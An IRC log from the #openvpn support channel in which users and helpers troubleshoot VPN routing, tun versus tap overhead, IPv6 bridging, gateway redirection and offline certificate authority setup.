09:41 -!- yuri___ [~cek@crius.pantheon.fused.net] has joined #openvpn
09:41 < pekster> yuri___: OpenVPN is unaware of the system interface. See the --keepalive or assorted --ping options to have it reconnect if you lose your interface though. See also:
09:41 < pekster> !keepalive
09:41 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive
09:50 <@plaisthos> You can force a reconnect via management interface
09:57 -!- pa [~pa@unaffiliated/pa] has quit [Quit: Sto andando via]
09:58 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
09:58 -!- MarKsaitis [~MarKsaiti@194.168.230.106] has quit [Ping timeout: 248 seconds]
09:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
10:01 -!- AsadH is now known as zz_AsadH
10:05 < `nand`> With an IPv6-compatible kernel, the ‘tap0’ interface created by OpenVPN should automatically get a link-local IPv6 address, right?
10:06 < `nand`> at least, it does for me
10:20 -!- raidz_away is now known as raidz
10:36 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds]
10:37 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds]
10:37 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds]
10:38 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has joined #openvpn
10:38 -!- nutcase [~nutcase@2605:6400:2:fed5:22:0:b4f1:bd54] has quit [Changing host]
10:38 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
10:39 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn
10:43 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
10:43 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds]
10:55 -!- marcolepsy [~marcoleps@64-121-192-7.c3-0.eas-ubr2.atw-eas.pa.cable.rcn.com] has quit [Remote host closed the connection]
10:55 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:58 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
10:59 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Operation timed out]
11:05 -!- zz_AsadH is now known as AsadH
11:05 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn
11:06 -!- str8uplinux [~dschuett@mail.lonemountaintruck.com] has left #openvpn []
11:18 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has joined #openvpn
11:22 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:29 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
11:30 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
11:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
11:40 -!- amir__ [~amir@unaffiliated/amir] has quit [Ping timeout: 260 seconds]
11:57 -!- AsadH is now known as zz_AsadH
12:02 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has joined #openvpn
12:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
12:22 -!- p3rror [~mezgani@2001:0:53aa:64c:3407:77b8:d673:9b9f] has quit [Ping timeout: 245 seconds]
12:25 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
12:26 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has joined #openvpn
12:31 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
12:32 < fys> https://sphotos-b.xx.fbcdn.net/hphotos-frc1/526942_10101400289390664_1220964790_n.jpg
12:32 < fys> lmao
12:37 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
12:40 -!- `nand` [~nand@static.102.126.46.78.clients.your-server.de] has quit [Quit: nand]
12:41 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn
12:48 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds]
12:51 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
12:53 -!- zz_AsadH is now known as AsadH
13:01 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in]
13:05 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
13:06 -!- b1rkh0ff [~b1rkh0ff@178.77.19.125] has quit [Read error: Connection reset by peer]
13:09 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has quit [Changing host]
13:09 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn
13:14 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
13:20 -!- rob0_ [rob0@harrier.slackbuilds.org] has joined #openvpn
13:20 -!- rob0_ [rob0@harrier.slackbuilds.org] has quit [Changing host]
13:20 -!- rob0_ [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn
13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds]
13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:24 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds]
13:24 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds]
13:24 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds]
13:25 -!- Netsplit *.net <-> *.split quits: rob0
13:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
13:40 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
13:43 <+EugeneKay> fys - #openvpn != #redditrepostsfromtwodaysago
13:47 -!- b1rkh0ff [~b1rkh0ff@178.77.19.125] has joined #openvpn
13:49 -!- novaflash is now known as novaflash_away
13:50 -!- novaflash_away is now known as novaflash
13:51 -!- novaflash is now known as novaflash_away
13:53 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 252 seconds]
13:53 -!- novaflash_away is now known as novaflash
14:01 < fys> EugeneKay: Still funny, sir.
14:02 <+EugeneKay> Unfortunately we're very somber people here
14:04 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn
14:12 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn
14:15 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has joined #openvpn
14:16 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Quit: Ex-Chat]
14:18 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Remote host closed the connection]
14:23 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Quit: I'm out!]
14:27 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn
14:28 < `nand`> Is there anything I can do to optimize the overhead added by OpenVPN? I experience a drop of about 50 kB/s in bandwidth when measuring with nuttcp
14:28 < `nand`> That's with comp-lzo enabled. Disabling lzo increases it slightly, but about 4 kB/s
14:28 < `nand`> but that might just be measuring error
14:32 <@dazo> `nand`: do you use tun or tap?
14:32 < `nand`> dazo: tap
14:32 <@dazo> switch to tun
14:32 <@dazo> tun has lower overhead than tap
14:32 <@dazo> !tunortap
14:32 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Don't waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
14:32 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
14:33 < `nand`> I'm not sure if that's a possibility for me
14:33 * dazo shrugs
14:33 < `nand`> I'm using it, among other things, as an IPv6 bridge; but my ISP doesn't give me a proper routed block so I proxy the NDP messages instead
14:33 <@dazo> `nand`: openvpn 2.3 supports IPv6 over tun
14:33 < `nand`> I'm guessing those are level 2
14:34 < module000> `nand`: the key part of ipv6 is the "IP" part. i.e.…that's layer3, ergo you are better off to use tun.
14:34 <@dazo> module000: well, before openvpn 2.3, it didn't support IPv6 over tun that easily ;-)
14:35 < `nand`> dazo: I have 2.3.0 on the client, but only 2.1.3 on the server
14:35 <@dazo> `nand`: well ... then you must upgrade your server ... 2.1.3 is way old and no longer maintained by the community
14:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
14:47 -!- dazo is now known as dazo_afk
14:48 < `nand`> bleh, switched to debian testing and it still only has 2.2.1
14:48 < `nand`> I really need to move my server to a sane distro. w/e
14:50 < module000> `nand`: if you're using testing, it compiles the latest pretty nicely. I think the only deps i had to install were liblzo-dev and openssl-dev (sp?), and the normal 'build-essential' set of tools
14:51 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
14:51 -!- yuri___ [~cek@crius.pantheon.fused.net] has quit [Ping timeout: 256 seconds]
14:53 < `nand`> needed libpam-dev as well
14:57 -!- satdav [~satdav@firefox/community/satdav] has joined #openvpn
14:57 < satdav> Hello can anyone help me out
14:57 < satdav> with an issue
14:57 < satdav> on debian
14:58 < satdav> when i try to start the service i am getting iptables service not started because of error (SVC_RUN_EXCEPT)
14:59 <@novaflash> satdav: are you using Access Server?
14:59 < module000> satdav: please stop copy/pasting this question into every linux support channel
15:03 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds]
15:04 < `nand`> alright, I'm on 2.3 on both sides now; how do I get IPv6 to work over tun instead of tap now? I tried giving both adapters their corresponding IPv6 address (via ‘ifconfig tun0 add ...’) but packets don't get delivered between the two
15:04 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
15:05 < satdav> iptables service not started because of error (SVC_RUN_EXCEPT)
15:05 < satdav> is what i am getting when trying to start the webserver for it
15:05 <@novaflash> satdav: are.
15:05 <@novaflash> satdav: you.
15:05 <@novaflash> satdav: using.
15:05 <@novaflash> satdav: access.
15:05 <@novaflash> satdav: server.
15:06 < satdav> I am trying to enable it on the webapp
15:06 <@ecrist> !as
15:06 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
15:06 <@ecrist> satdav: see that
15:07 < `nand`> hmm, looks like I can route IPv6 packets by using --server-ipv6 with the corresponding prefix
15:07 < `nand`> but the server picks the wrong address for itself. It picks prefix::1 but I want it to use ::2 instead
15:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
15:14 < `nand`> alright, I've fixed up the IPs involved, but now I'm not getting IPv6 packets from outside the VPN
15:15 < `nand`> it looks like OpenVPN isn't transmitting NDP packets
15:16 < `nand`> I can disable NDP proxying and set my router to always give a static answer instead, but then anybody could probably overload my system by pinging lots of addresses in that block and exhausting my NDP table
15:16 -!- cek [~cek@crius.pantheon.fused.net] has joined #openvpn
15:17 -!- master_of_master [~master_of@p57B53160.dip.t-dialin.net] has quit [Ping timeout: 256 seconds]
15:17 -!- cek [~cek@crius.pantheon.fused.net] has quit [Client Quit]
15:18 -!- master_of_master [~master_of@p57B53160.dip.t-dialin.net] has joined #openvpn
15:20 < `nand`> I could probably solve this by forgoing ndppd entirely and just setting up exceptions for every new connection. Is there an option to run some script for every new client that connects?
15:21 < `nand`> (and ideally also for clients that disconnect)
15:21 < `nand`> ah, --client-connect
15:24 -!- satdav_ [~satdav@89.207.132.64] has joined #openvpn
15:24 -!- satdav_ is now known as Guest21165
15:28 -!- satdav [~satdav@firefox/community/satdav] has quit [Ping timeout: 272 seconds]
15:34 -!- satdav__ [~satdav@89.207.132.64] has joined #openvpn
15:38 -!- Guest21165 [~satdav@89.207.132.64] has quit [Ping timeout: 272 seconds]
15:40 < `nand`> hmm. There's #ifconfig_pool_remote_ip for the remote IPv4 address, but there doesn't seem to be a corresponding environment variable for IPv6
15:42 < `nand`> https://community.openvpn.net/openvpn/ticket/230
15:42 <@vpnHelper> Title: #230 (IPV6 environment variables missing for client-connect) – OpenVPN Community (at community.openvpn.net)
15:42 < `nand`> Would it be possible to get this fixed any time soon? I can't think of any workaround
15:43 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has left #openvpn []
15:47 < satdav__> is it hard to setup this version of openvpn
15:47 < `nand`> heh, maybe I could persist the ifconfig pool to a file and just grep for the username in that. It'd be an awful hack, though
15:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
15:50 < `nand`> no, that won't work, it isn't updated immediately :(
15:53 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has quit [Remote host closed the connection]
15:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
15:58 -!- satdav__ is now known as SATDAV
15:58 -!- SATDAV is now known as satdav
15:59 -!- satdav [~satdav@89.207.132.64] has quit [Changing host]
15:59 -!- satdav [~satdav@firefox/community/satdav] has joined #openvpn
15:59 -!- bscalp [~bscalp@cap69-1-82-233-37-6.fbx.proxad.net] has joined #openvpn
16:00 < bscalp> !welcome
16:00 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
16:00 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
16:00 < satdav> !help
16:00 <@vpnHelper> (help [<plugin>] [<command>]) -- This command gives a useful description of what <command> does. <plugin> is only necessary if the command is in more than one plugin.
16:00 < satdav> !support
16:00 < satdav> !list
16:00 <@vpnHelper> Admin, BadWords, Channel, ChannelLogger, Config, Factoids, FloodPrevent, Google, Misc, Owner, Relay, Seen, Services, User, Weather, and Web
16:00 < satdav> !seen
16:00 <@vpnHelper> (seen [<channel>] <nick>) -- Returns the last time <nick> was seen and what <nick> was last seen saying. <channel> is only necessary if the message isn't sent on the channel itself.
16:00 < satdav> !relay
16:00 < satdav> !help relay
16:00 <@vpnHelper> Error: There is no command "relay".
16:06 < `nand`> dazo_afk: using tun now, the overhead still seems to be around 60 kB/s
16:06 < `nand`> (this is without lzo)
16:07 < `nand`> I can't really get a good measurement with lzo because apparently the data nuttcp sends is very easy to compress and I get unnaturally high figures; but that won't work for anything complicated eg. a video file
16:07 < `nand`> (which makes me wonder why that wasn't the case for tap)
16:10 < `nand`> I switched back to tap and I'm getting identical figures (still without lzo)
16:10 < `nand`> but this way has much less hassle
16:13 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
16:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
16:19 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Operation timed out]
16:19 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
16:20 -!- bscalp [~bscalp@cap69-1-82-233-37-6.fbx.proxad.net] has quit [Ping timeout: 255 seconds]
16:35 -!- mcp [~mcp@wolk-project.de] has quit [Quit: ZNC - http://znc.sourceforge.net]
16:40 -!- jmontano [~Thunderbi@dsl-emcali-200.29.103.65.emcali.net.co] has joined #openvpn
16:40 < jmontano> !welcome
16:40 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
16:40 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
16:42 < jmontano> !route
16:42 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
16:51 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn
16:55 -!- labcoattech [~Imran@cpc4-nott18-2-0-cust11.12-2.cable.virginmedia.com] has joined #openvpn
16:56 < labcoattech> hi all
16:56 < labcoattech> can someone please help me setup openvpn correctly, I have configured it as per instructions from the pfsense 2.0 cookbook, my phone is able to connect to the vpn but it can not see the lan
16:57 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
17:18 -!- jmontano [~Thunderbi@dsl-emcali-200.29.103.65.emcali.net.co] has quit [Remote host closed the connection]
17:20 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has joined #openvpn
17:21 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
17:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
17:34 -!- p3rror [~mezgani@2001:0:53aa:64c:2835:31c7:d673:9b9f] has quit [Ping timeout: 245 seconds]
17:35 < labcoattech> how do I create a schedule to start at 7pm and end at 9am? i get an error saying stop time can not be before start time
17:36 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Remote host closed the connection]
17:37 -!- labcoattech [~Imran@cpc4-nott18-2-0-cust11.12-2.cable.virginmedia.com] has left #openvpn []
17:42 -!- Masxmasx [~IetsVulga@unaffiliated/masxmasx] has joined #openvpn
17:46 < Masxmasx> On the "Your problem is probably firewall", should I enable L2TP passthrough and IPSec Passthrough in my router?
17:52 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 256 seconds]
17:54 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
18:36 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection]
18:38 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
18:46 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Excess Flood]
18:49 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
19:04 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 255 seconds]
19:08 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has joined #openvpn
19:08 -!- satdav [~satdav@firefox/community/satdav] has quit [Quit: Leaving]
19:09 < stormerider> question... i need my local ovpn client to ignore one of the routes from the vpn server. i see i can do this with "route-nopull". is there an option in the client to specify the routes i do want to use with the vpn config or do i need to configure them through the native mechanism on my router?
19:12 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
19:24 < Cpt-Oblivious> storm, what exactly do you mean?
19:24 < Cpt-Oblivious> So your server is pushing certain routes, but 1 of the clients doesn't want 1 of the routes, correct?
19:26 -!- adolfomaltez [~taro@190.62.205.97] has joined #openvpn 19:26 < Cpt-Oblivious> If that's what you want, then you should indeed use 'route-nopull', it then ignores all routes that are being pushed to it. If there are other routes the client should know about, then you should just specify those in the client config as well. 19:32 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has quit [Read error: Connection reset by peer] 19:33 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has joined #openvpn 19:33 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has quit [Read error: Connection reset by peer] 19:34 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 19:34 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has joined #openvpn 19:36 -!- stormerider [~morgan@c-174-61-209-90.hsd1.wa.comcast.net] has left #openvpn [] 19:41 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 19:43 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Ping timeout: 252 seconds] 19:45 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 20:18 -!- adolfomaltez [~taro@190.62.205.97] has quit [Ping timeout: 272 seconds] 20:19 -!- adolfomaltez [~taro@190.62.247.125] has joined #openvpn 20:26 < pekster> Masxmasx: OpenVPN is a separate protocol from L2TP and IPSec. It uses a single UDP (or TCP, if configured as such) port and all traffic is sent across it. The firewall comment in our /topic implies many people forget to allow the VPN network through their respective firewalls 20:35 < Valcorb> !howto 20:35 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! 
or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 20:35 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 20:36 < Valcorb> hello everyone 20:36 < Valcorb> i currently have a Debian VPS 20:36 < Valcorb> and I'm trying to make it an OpenVPN server 20:37 < Valcorb> I'm able to connect to it 20:37 < Valcorb> but once I'm connected, I'm not able to browse nor use the internet 20:37 < Valcorb> here's my conf: http://pastebin.com/ugqkSiky 20:37 < Valcorb> I'm connecting from Windows 7 with OpenVPN 2.3 20:45 -!- raidz is now known as raidz_away 20:45 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 20:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 260 seconds] 20:48 -!- Valcorb|| is now known as Valcorb 20:55 < pekster> Valcorb: Unable to browse or use the Internet from the client? There's no gateway redirection being pushed from the server; are you doing any further configuring of routes on the client? 20:56 < pekster> Also, configs with mostly comments and whitespace like that are harder to read; it's better if you pipe your configuration files through a sedscript like the following: 20:56 < pekster> sed -e '/^[#;]/ d' -e '/^$/ d' 20:56 < Valcorb> aha 20:56 < Valcorb> i see 20:56 < Valcorb> well im just unable to use the internet 20:56 < Valcorb> whenever I'm connected to it 20:56 < pekster> Can you post the client config too? (preferably run through the aforementioned sedscript to clean it up) 21:00 < Valcorb> sure 21:00 -!- AsadH is now known as zz_AsadH 21:00 < Valcorb> you want me to include the server IP as well pekster? 21:01 < pekster> That's not required, although the less you change the easier it is to debug. If you're getting connected, it's not the destination that's the issue 21:02 < Valcorb> yeah true 21:02 < Valcorb> http://pastebin.com/UkSYF5B9 21:03 < pekster> So, nothing special appears to be happening to the gateway after you connect. 
Unless your local LAN or configured DNS server is within the 10.8.0.0/24 range, there's no reason your network traffic should stop working 21:03 < pekster> Can you ping things by IP? Try 8.8.8.8 (the IP for google DNS) 21:04 < pekster> If that works, try a ping by DNS to say google.com 21:04 < Valcorb> on my VPS or local computer? 21:05 < pekster> It's your client that's having connection issues, right? Do it on that system 21:05 < Valcorb> Yeah client pings fine 21:06 < Valcorb> its a weird issue 21:06 < pekster> Both by IP and DNS? If so, your Internet is working fine on the client... 21:06 < Valcorb> oh 21:06 < Valcorb> im not connected 21:06 < Valcorb> to the server at the moment 21:06 < Valcorb> If i was i wouldn't be here :P 21:06 < pekster> Well, do that first 21:06 < Valcorb> alright 21:06 < Valcorb> damn, brb in 30 minutes 21:19 -!- adolfomaltez [~taro@190.62.247.125] has quit [Ping timeout: 272 seconds] 21:20 < Valcorb> ok im back 21:20 < Valcorb> lets try 21:22 < Valcorb> ok im connected 21:22 < Valcorb> but my IP didn't change 21:23 < Valcorb> pekster: 21:23 < pekster> It won't "change" -- you just get another IP on the VPN segment 21:23 < Valcorb> Yeah 21:23 < Valcorb> but the actual reason I want it for is so my IP would be hidden 21:23 < pekster> !redirect 21:23 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 21:23 <@vpnHelper> http://ircpimps.org/redirect.png 21:24 < Valcorb> i see 21:24 < Valcorb> so i will need redirect-gateway? 
21:24 < pekster> And everything else on that flowchart 21:24 < Devastator> As some here might already know, I'm thinking how to handle keys/certs for a "kind of" paranoid setup, this is the last idea I had, if someone can comment about it, here it is: http://codepad.org/Q2ZncsQB 21:24 <@vpnHelper> Title: Plain Text code - 27 lines - codepad (at codepad.org) 21:25 < Valcorb> !def1 21:25 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 21:25 < pekster> Devastator: If that's the same setup you highlighted me on a few days ago, it looks much better. No real need to "erase" the USB stick with the public stuff on it (deleting them might leave them "recoverable", but they are after all public) 21:25 < Devastator> pekster still not perfect, right? 
heheh 21:26 < pekster> As long as the usb with the private files doesn't touch systems besides your CA box, that's fully separate 21:26 < pekster> ie: a compromise (even theft, or loss of a password) does not destroy your PKI 21:26 < pekster> Unless it's your CA storage that was lost/compromised, of course 21:27 < pekster> You might need to revoke the client or server cert due to lack of trust, but the rest of the PKI remains secure and intact if an issued keypair falls into the wrong hands 21:27 < Devastator> pekster I read what I did a few times, it doesn't seem to touch anything else but the CA box, but I wanted to be sure by someone else looking at it 21:27 < pekster> Yup 21:28 < Devastator> ok, so I will print it and use as my personal step-by-step until I feel confident enough to throw it away 21:28 < pekster> Remember this does mean you can't generate or update keys without the CA system (which IIRC you were keeping offline) so if you travel away and your cert expires, you're screwed until you can get back to your files ;) 21:29 < Devastator> unless I sleep with a CA system copy attached to my body 21:30 < pekster> Keep a gun too, just in case The Man tries to get you ;) 21:30 < pekster> Security is all relative to what you're defending against 21:30 < Devastator> sure! 21:31 < Devastator> my CA system will be: 1 usb stick with easy-rsa dir, 1 usb stick with a live distro, done, it's offline and portable 21:31 < pekster> I run "much" of my PKI off of an online (and reasonably-well-protected) system. Small portions of it are still offline. 
I have one PKI that the roots are offline, but I created a sub-CA (and cert under the offline roots that can itself sign) 21:31 -!- adolfomaltez [~taro@190.62.247.125] has joined #openvpn 21:31 < Devastator> I don't have that kind of skill 21:32 < pekster> Again, all depends on what your goals are 21:32 < Devastator> probably my grandson, or even his son 21:32 < pekster> Lots of people just do easy-rsa out of the same online system their server runs on 21:33 < pekster> Nothing wrong with that, but it "opens up" the door to any service (maybe openssh, apache, etc) to let an attacker get into those files and try to brute-force your CA key. Many people don't even try to stop that threat beyond updating the OS 21:33 < Devastator> I just find it.. unsafe, because, as you said the other day, everything is in there 21:33 < pekster> Pick your level of paranoia and stick with it 21:34 < Devastator> I try to do what is considered sane for most real sysadmins 21:34 < Devastator> not fake sysadmins 21:34 < pekster> Online CAs are common, but they're separated based on duty. "Mission critical" stuff for highly secured companies are in vaults with guards and careful logs about each and every access and change 21:35 < pekster> eg: the CAs that sign website certificates have to pass extensive audits to be allowed into OSes and browsers 21:35 < pekster> (and some of them are run by corrupt governments anyway, but I won't go into that today) 21:36 < Devastator> pekster do you know those kinds that install openvpn just to say they have it? I'm trying not to be that kind of person, I'm trying to take advantage of what it provides 21:38 < Devastator> some people still call me crazy for setting up vlans for a 20 user lan 21:39 < Devastator> they ask: why didn't you setup an alias instead? routed your modem and plugged into a switch and used opendns to filter? 21:45 < Devastator> well, I don't know if I'm making any sense right now heheh 21:46 < pekster> OpenDNS sucks. 
They violate spec by sending you to their ad-generating domain instead of returning NXDOMAIN. Use GoogleDNS instead. 21:47 -!- _DomY-Dom [~hussainah@94.23.145.51] has joined #openvpn 21:48 < Devastator> nah, right now I'm using dnsmasq + prerouting rule 21:49 < Valcorb> !redirect 21:49 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 21:49 <@vpnHelper> http://ircpimps.org/redirect.png 21:49 < Devastator> but I plan to switch to squid shortly 21:49 < Valcorb> !ipforward 21:49 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 21:49 < Valcorb> !nat 21:49 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 21:50 < Devastator> my point is.. I don't understand how people satisfy themselves with such a "lame" solution imho 21:50 < _DomY-Dom> Hello, I have an interesting query. I am trying to get Viscosity to connect to a openvpn connection through the command-line. I can already do it just by 